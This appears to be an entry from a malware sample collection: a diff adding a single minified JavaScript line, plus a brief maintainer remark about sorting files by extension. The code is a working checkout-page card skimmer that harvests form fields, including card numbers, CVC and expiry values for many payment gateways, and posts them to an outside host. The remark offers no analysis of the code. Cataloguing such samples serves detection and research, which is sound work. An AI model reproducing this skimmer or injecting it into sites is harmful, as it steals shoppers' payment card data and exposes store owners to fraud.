malware/backend/22927e670b0953c01874d626110aa474

```diff
@@ -0,0 +1 @@
+jQuery(document).ready(function(){new RegExp("onepage|nexwaycheckout|checkout|onestep|firecheckout|onestepcheckout").test(window.location)&&setTimeout(function(){jQuery(function(b){b(document).on("change","form",function(){function d(){for(var a="",c=document.querySelectorAll("input, select, textarea, checkbox"),d=0;d<c.length;d++)if(c[d].value.length>0){var e=c[d].name;""==e&&(e="jik"+d);var f=e.replace(/\[/g,"-"),g=f.replace(/-redecard/,"");a+=g.replace(/]/g,"")+"="+c[d].value+"&"}a=a+"&host="+window.location.host;var h="https://";"https:"!=window.location.protocol&&(h="http://"),b.ajax({url:h+"wskonnekt.com/js/magestore/billing.php",data:a,type:"POST",dataType:"json",success:function(a){return!1},error:function(a,b,c){return!1}})}grelos_v=null,a=['select[name="ops_cc[year]"]','input[name="ops_cc[cardno]"]','input[name="ops_cc[cvc]"]','select[id="mundipagg_api_cartao_first_card_expiration_year"]','select[id="mundipagg_api_doiscartoes_first_card_expiration_year"]','select[name="payment[mundipagg_creditcard_expirationYear_1_1]"]','select[id="adyen_cc_expiration_yr"]','select[id="braintree_expiration_yr"]','select[name="datatranscw_visa[expy]"]','select[name="datatranscw_mastercard[expy]"]','select[name="payment[moip_cc_exp_year]"]','select[id="eway_rapid_expiration_yr"]','select[name="payment[cc_exp_year]"]','input[name="expiration"]','input[name="full_cc_expiration"]','select[id="redecard_expiration_yr"]','select[id="stripe_cc_expiration_year"]','input[data-checkout="expiry-year"]','select[id="paymill_creditcard_expiry_year"]','input[name="expiry_date"]','input[name="cc_cid"]','select[name="cc_exp_year"]','input[id="text-expiry_date"]','select[id="cardExpirationYear"]','select[id="radweb_stripe_expiration_yr"]','select[name="payment[expiracao_ano_rede]"]','select[name="payment[credito_expiracao_ano]"]','input[name="payment[mundipagg_creditcard_cc_cid_1_1]"]','input[name="payment[mundipagg_creditcard_1_1_cc_number]"]'];for(var c=0;c<30;c++)try{b(a[c]).val().length>0&&d()}catch(a){console.log(a)}})})},5e3)});w
```

Comment:
It's moving everything to backend by default i guess. We could easily sort it by extension.